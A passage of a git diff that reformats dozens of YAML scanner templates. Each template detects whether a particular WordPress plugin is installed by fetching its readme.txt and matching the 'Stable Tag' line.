- "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-sg-cachepress.yaml b/technologies/wordpress/wordpress-sg-cachepress.yaml index 15056cfcce..06a46d9b8c 100644 --- a/technologies/wordpress/wordpress-sg-cachepress.yaml +++ b/technologies/wordpress/wordpress-sg-cachepress.yaml @@ -1,4 +1,3 @@ - id: wordpress-sg-cachepress info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/sg-cachepress/ metadata: plugin_namespace: sg-cachepress - wpscan: https://wpscan.com/plugin/sg-cachepress + wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/sg-cachepress/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-sg-security.yaml b/technologies/wordpress/wordpress-sg-security.yaml index e102e29290..936700a0f6 100644 --- a/technologies/wordpress/wordpress-sg-security.yaml +++ b/technologies/wordpress/wordpress-sg-security.yaml @@ -1,4 +1,3 @@ - id: wordpress-sg-security info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/sg-security/ metadata: plugin_namespace: sg-security - wpscan: https://wpscan.com/plugin/sg-security + wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/sg-security/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-shortcodes-ultimate.yaml b/technologies/wordpress/wordpress-shortcodes-ultimate.yaml index 77b6792672..f6d758ab3f 100644 --- a/technologies/wordpress/wordpress-shortcodes-ultimate.yaml +++ b/technologies/wordpress/wordpress-shortcodes-ultimate.yaml @@ -1,4 +1,3 @@ - id: wordpress-shortcodes-ultimate info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: plugin_namespace: shortcodes-ultimate - wpscan: https://wpscan.com/plugin/shortcodes-ultimate + wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/shortcodes-ultimate/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml b/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml index a5343ca0ab..c2e12ec1a3 100644 --- a/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml +++ b/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml @@ -1,4 +1,3 @@ - id: wordpress-shortpixel-image-optimiser info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: plugin_namespace: shortpixel-image-optimiser - wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser + wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/shortpixel-image-optimiser/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-simple-custom-post-order.yaml b/technologies/wordpress/wordpress-simple-custom-post-order.yaml index 228937eed8..cc3f2ad97d 100644 --- a/technologies/wordpress/wordpress-simple-custom-post-order.yaml +++ b/technologies/wordpress/wordpress-simple-custom-post-order.yaml @@ -1,4 +1,3 @@ - id: wordpress-simple-custom-post-order info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: plugin_namespace: simple-custom-post-order - wpscan: https://wpscan.com/plugin/simple-custom-post-order + wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/simple-custom-post-order/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-simple-page-ordering.yaml b/technologies/wordpress/wordpress-simple-page-ordering.yaml index 779efdb309..5d5831e9df 100644 --- a/technologies/wordpress/wordpress-simple-page-ordering.yaml +++ b/technologies/wordpress/wordpress-simple-page-ordering.yaml @@ -1,4 +1,3 @@ - id: wordpress-simple-page-ordering info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/simple-page-ordering/ metadata: plugin_namespace: simple-page-ordering - wpscan: https://wpscan.com/plugin/simple-page-ordering + wpscan: https://wpscan.com/plugin/simple-page-ordering tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/simple-page-ordering/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-siteguard.yaml b/technologies/wordpress/wordpress-siteguard.yaml index d1da80a6a8..a6f86c2b23 100644 --- a/technologies/wordpress/wordpress-siteguard.yaml +++ b/technologies/wordpress/wordpress-siteguard.yaml @@ -1,4 +1,3 @@ - id: wordpress-siteguard info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/siteguard/ metadata: plugin_namespace: siteguard - wpscan: https://wpscan.com/plugin/siteguard + wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-siteorigin-panels.yaml b/technologies/wordpress/wordpress-siteorigin-panels.yaml index 88852ad4d9..f115d57a2a 100644 --- a/technologies/wordpress/wordpress-siteorigin-panels.yaml +++ b/technologies/wordpress/wordpress-siteorigin-panels.yaml @@ -1,4 +1,3 @@ - id: wordpress-siteorigin-panels info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/siteorigin-panels/ metadata: plugin_namespace: siteorigin-panels - wpscan: https://wpscan.com/plugin/siteorigin-panels + wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/siteorigin-panels/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-smart-slider-3.yaml b/technologies/wordpress/wordpress-smart-slider-3.yaml index 593f65fcc4..3acef1da2e 100644 --- a/technologies/wordpress/wordpress-smart-slider-3.yaml +++ b/technologies/wordpress/wordpress-smart-slider-3.yaml @@ -1,4 +1,3 @@ - id: wordpress-smart-slider-3 info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/smart-slider-3/ metadata: plugin_namespace: smart-slider-3 - wpscan: https://wpscan.com/plugin/smart-slider-3 + wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/smart-slider-3/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-so-widgets-bundle.yaml b/technologies/wordpress/wordpress-so-widgets-bundle.yaml index 9c8b1b262f..0594d2b9bb 100644 --- a/technologies/wordpress/wordpress-so-widgets-bundle.yaml +++ b/technologies/wordpress/wordpress-so-widgets-bundle.yaml @@ -1,4 +1,3 @@ - id: wordpress-so-widgets-bundle info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: plugin_namespace: so-widgets-bundle - wpscan: https://wpscan.com/plugin/so-widgets-bundle + wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/so-widgets-bundle/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml b/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml index 05aaf95168..bf034c8d13 100644 --- a/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml +++ b/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml @@ -1,4 +1,3 @@ - id: wordpress-ssl-insecure-content-fixer info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/ssl-insecure-content-fixer/ metadata: plugin_namespace: ssl-insecure-content-fixer - wpscan: https://wpscan.com/plugin/ssl-insecure-content-fixer + wpscan: https://wpscan.com/plugin/ssl-insecure-content-fixer tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ssl-insecure-content-fixer/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml b/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml index 6d421b3e4e..6f52390832 100644 --- a/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml +++ b/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml @@ -1,4 +1,3 @@ - id: wordpress-stops-core-theme-and-plugin-updates info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: plugin_namespace: stops-core-theme-and-plugin-updates - wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates + wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/stops-core-theme-and-plugin-updates/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-sucuri-scanner.yaml b/technologies/wordpress/wordpress-sucuri-scanner.yaml index 4930a39892..9ca3e840a8 100644 --- a/technologies/wordpress/wordpress-sucuri-scanner.yaml +++ b/technologies/wordpress/wordpress-sucuri-scanner.yaml @@ -1,4 +1,3 @@ - id: wordpress-sucuri-scanner info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/sucuri-scanner/ metadata: plugin_namespace: sucuri-scanner - wpscan: https://wpscan.com/plugin/sucuri-scanner + wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/sucuri-scanner/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-svg-support.yaml b/technologies/wordpress/wordpress-svg-support.yaml index 1b57ac411b..c970433a55 100644 --- a/technologies/wordpress/wordpress-svg-support.yaml +++ b/technologies/wordpress/wordpress-svg-support.yaml @@ -1,4 +1,3 @@ - id: wordpress-svg-support info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/svg-support/ metadata: plugin_namespace: svg-support - wpscan: https://wpscan.com/plugin/svg-support + wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/svg-support/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-table-of-contents-plus.yaml b/technologies/wordpress/wordpress-table-of-contents-plus.yaml index dd08543ee5..ff1a310722 100644 --- a/technologies/wordpress/wordpress-table-of-contents-plus.yaml +++ b/technologies/wordpress/wordpress-table-of-contents-plus.yaml @@ -1,4 +1,3 @@ - id: wordpress-table-of-contents-plus info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: plugin_namespace: table-of-contents-plus - wpscan: https://wpscan.com/plugin/table-of-contents-plus + wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-tablepress.yaml b/technologies/wordpress/wordpress-tablepress.yaml index 82f8c4973b..b98a242d8d 100644 --- a/technologies/wordpress/wordpress-tablepress.yaml +++ b/technologies/wordpress/wordpress-tablepress.yaml @@ -1,4 +1,3 @@ - id: wordpress-tablepress info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/tablepress/ metadata: plugin_namespace: tablepress - wpscan: https://wpscan.com/plugin/tablepress + wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/tablepress/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-taxonomy-terms-order.yaml b/technologies/wordpress/wordpress-taxonomy-terms-order.yaml index 67b2fa9f85..a2e965cb5d 100644 --- a/technologies/wordpress/wordpress-taxonomy-terms-order.yaml +++ b/technologies/wordpress/wordpress-taxonomy-terms-order.yaml @@ -1,4 +1,3 @@ - id: wordpress-taxonomy-terms-order info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: plugin_namespace: taxonomy-terms-order - wpscan: https://wpscan.com/plugin/taxonomy-terms-order + wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/taxonomy-terms-order/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-the-events-calendar.yaml b/technologies/wordpress/wordpress-the-events-calendar.yaml index 27e2caaa7c..1de778b59a 100644 --- a/technologies/wordpress/wordpress-the-events-calendar.yaml +++ b/technologies/wordpress/wordpress-the-events-calendar.yaml @@ -1,4 +1,3 @@ - id: wordpress-the-events-calendar info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/the-events-calendar/ metadata: plugin_namespace: the-events-calendar - wpscan: https://wpscan.com/plugin/the-events-calendar + wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/the-events-calendar/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-themeisle-companion.yaml b/technologies/wordpress/wordpress-themeisle-companion.yaml index 84aec52788..52645cdb58 100644 --- a/technologies/wordpress/wordpress-themeisle-companion.yaml +++ b/technologies/wordpress/wordpress-themeisle-companion.yaml @@ -1,4 +1,3 @@ - id: wordpress-themeisle-companion info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/themeisle-companion/ metadata: plugin_namespace: themeisle-companion - wpscan: https://wpscan.com/plugin/themeisle-companion + wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/themeisle-companion/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-tinymce-advanced.yaml b/technologies/wordpress/wordpress-tinymce-advanced.yaml index 9a5861b002..49ae80a9f3 100644 --- a/technologies/wordpress/wordpress-tinymce-advanced.yaml +++ b/technologies/wordpress/wordpress-tinymce-advanced.yaml @@ -1,4 +1,3 @@ - id: wordpress-tinymce-advanced info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/tinymce-advanced/ metadata: plugin_namespace: tinymce-advanced - wpscan: https://wpscan.com/plugin/tinymce-advanced + wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/tinymce-advanced/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-translatepress-multilingual.yaml b/technologies/wordpress/wordpress-translatepress-multilingual.yaml index 2c78201603..279212415e 100644 --- a/technologies/wordpress/wordpress-translatepress-multilingual.yaml +++ b/technologies/wordpress/wordpress-translatepress-multilingual.yaml @@ -1,4 +1,3 @@ - id: wordpress-translatepress-multilingual info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: plugin_namespace: translatepress-multilingual - wpscan: https://wpscan.com/plugin/translatepress-multilingual + wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/translatepress-multilingual/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml b/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml index d4633d0651..918aa52f28 100644 --- a/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml +++ b/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml @@ -1,4 +1,3 @@ - id: wordpress-ultimate-addons-for-gutenberg info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: plugin_namespace: ultimate-addons-for-gutenberg - wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg + wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-under-construction-page.yaml b/technologies/wordpress/wordpress-under-construction-page.yaml index 4a8f042b89..aa3a0aa440 100644 --- a/technologies/wordpress/wordpress-under-construction-page.yaml +++ b/technologies/wordpress/wordpress-under-construction-page.yaml @@ -1,4 +1,3 @@ - id: wordpress-under-construction-page info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/under-construction-page/ metadata: plugin_namespace: under-construction-page - wpscan: https://wpscan.com/plugin/under-construction-page + wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/under-construction-page/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-unyson.yaml b/technologies/wordpress/wordpress-unyson.yaml index 8a2dfd1f3d..97f34e994f 100644 --- a/technologies/wordpress/wordpress-unyson.yaml +++ b/technologies/wordpress/wordpress-unyson.yaml @@ -1,4 +1,3 @@ - id: wordpress-unyson info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/unyson/ metadata: plugin_namespace: unyson - wpscan: https://wpscan.com/plugin/unyson + wpscan: https://wpscan.com/plugin/unyson tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/unyson/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-updraftplus.yaml b/technologies/wordpress/wordpress-updraftplus.yaml index b70c0aea6e..fbbf293450 100644 --- a/technologies/wordpress/wordpress-updraftplus.yaml +++ b/technologies/wordpress/wordpress-updraftplus.yaml @@ -1,4 +1,3 @@ - id: wordpress-updraftplus info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/updraftplus/ metadata: plugin_namespace: updraftplus - wpscan: https://wpscan.com/plugin/updraftplus + wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/updraftplus/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-use-any-font.yaml b/technologies/wordpress/wordpress-use-any-font.yaml index 38ccc5ac1b..297ffa0284 100644 --- a/technologies/wordpress/wordpress-use-any-font.yaml +++ b/technologies/wordpress/wordpress-use-any-font.yaml @@ -1,4 +1,3 @@ - id: wordpress-use-any-font info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/use-any-font/ metadata: plugin_namespace: use-any-font - wpscan: https://wpscan.com/plugin/use-any-font + wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/use-any-font/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-user-role-editor.yaml b/technologies/wordpress/wordpress-user-role-editor.yaml index 77ec825aa2..772908ba6b 100644 --- a/technologies/wordpress/wordpress-user-role-editor.yaml +++ b/technologies/wordpress/wordpress-user-role-editor.yaml @@ -1,4 +1,3 @@ - id: wordpress-user-role-editor info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/user-role-editor/ metadata: plugin_namespace: user-role-editor - wpscan: https://wpscan.com/plugin/user-role-editor + wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/user-role-editor/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml b/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml index 09a19730c6..22c389cb75 100644 --- a/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml +++ b/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml @@ -1,4 +1,3 @@ - id: wordpress-velvet-blues-update-urls info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: plugin_namespace: velvet-blues-update-urls - wpscan: https://wpscan.com/plugin/velvet-blues-update-urls + wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/velvet-blues-update-urls/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-w3-total-cache.yaml b/technologies/wordpress/wordpress-w3-total-cache.yaml index c8e2b61d4b..1d8e755d3d 100644 --- a/technologies/wordpress/wordpress-w3-total-cache.yaml +++ b/technologies/wordpress/wordpress-w3-total-cache.yaml @@ -1,4 +1,3 @@ - id: wordpress-w3-total-cache info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/w3-total-cache/ metadata: plugin_namespace: w3-total-cache - wpscan: https://wpscan.com/plugin/w3-total-cache + wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,plugin,top-100 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/w3-total-cache/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-widget-importer-exporter.yaml b/technologies/wordpress/wordpress-widget-importer-exporter.yaml index eb63b53942..2ab3f87b98 100644 --- a/technologies/wordpress/wordpress-widget-importer-exporter.yaml +++ b/technologies/wordpress/wordpress-widget-importer-exporter.yaml @@ -1,4 +1,3 @@ - id: wordpress-widget-importer-exporter info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: plugin_namespace: widget-importer-exporter - wpscan: https://wpscan.com/plugin/widget-importer-exporter + wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/widget-importer-exporter/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml b/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml index 5dcf94db2e..0d452480ca 100644 --- a/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml +++ b/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml @@ -1,4 +1,3 @@ - id: wordpress-woo-cart-abandonment-recovery info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: plugin_namespace: woo-cart-abandonment-recovery - wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery + wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woo-cart-abandonment-recovery/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml b/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml index a7a4481df5..7a14f1a963 100644 --- a/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml +++ b/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml @@ -1,4 +1,3 @@ - id: wordpress-woo-checkout-field-editor-pro info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: plugin_namespace: woo-checkout-field-editor-pro - wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro + wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woo-checkout-field-editor-pro/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git a/technologies/wordpress/wordpress-woo-variation-swatches.yaml b/technologies/wordpress/wordpress-woo-variation-swatches.yaml index b6e620c400..c2a4624a44 100644 --- a/technologies/wordpress/wordpress-woo-variation-swatches.yaml +++ b/technologies/wordpress/wordpress-woo-variation-swatches.yaml @@ -1,4 +1,3 @@ - id: wordpress-woo-variation-swatches info: @@ -9,7 +8,7 @@ info: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: plugin_namespace: woo-variation-swatches - wpscan: https://wpscan.com/plugin/woo-variation-swatches + wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,plugin,top-200 requests: @@ -18,11 +17,11 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woo-variation-swatches/readme.txt" - matchers-condition: and + matchers-condition: and matchers: - type: regex regex: - - '(?i)Stable.Tag' + - "(?i)Stable.Tag" - type: status status: - 200 diff --git 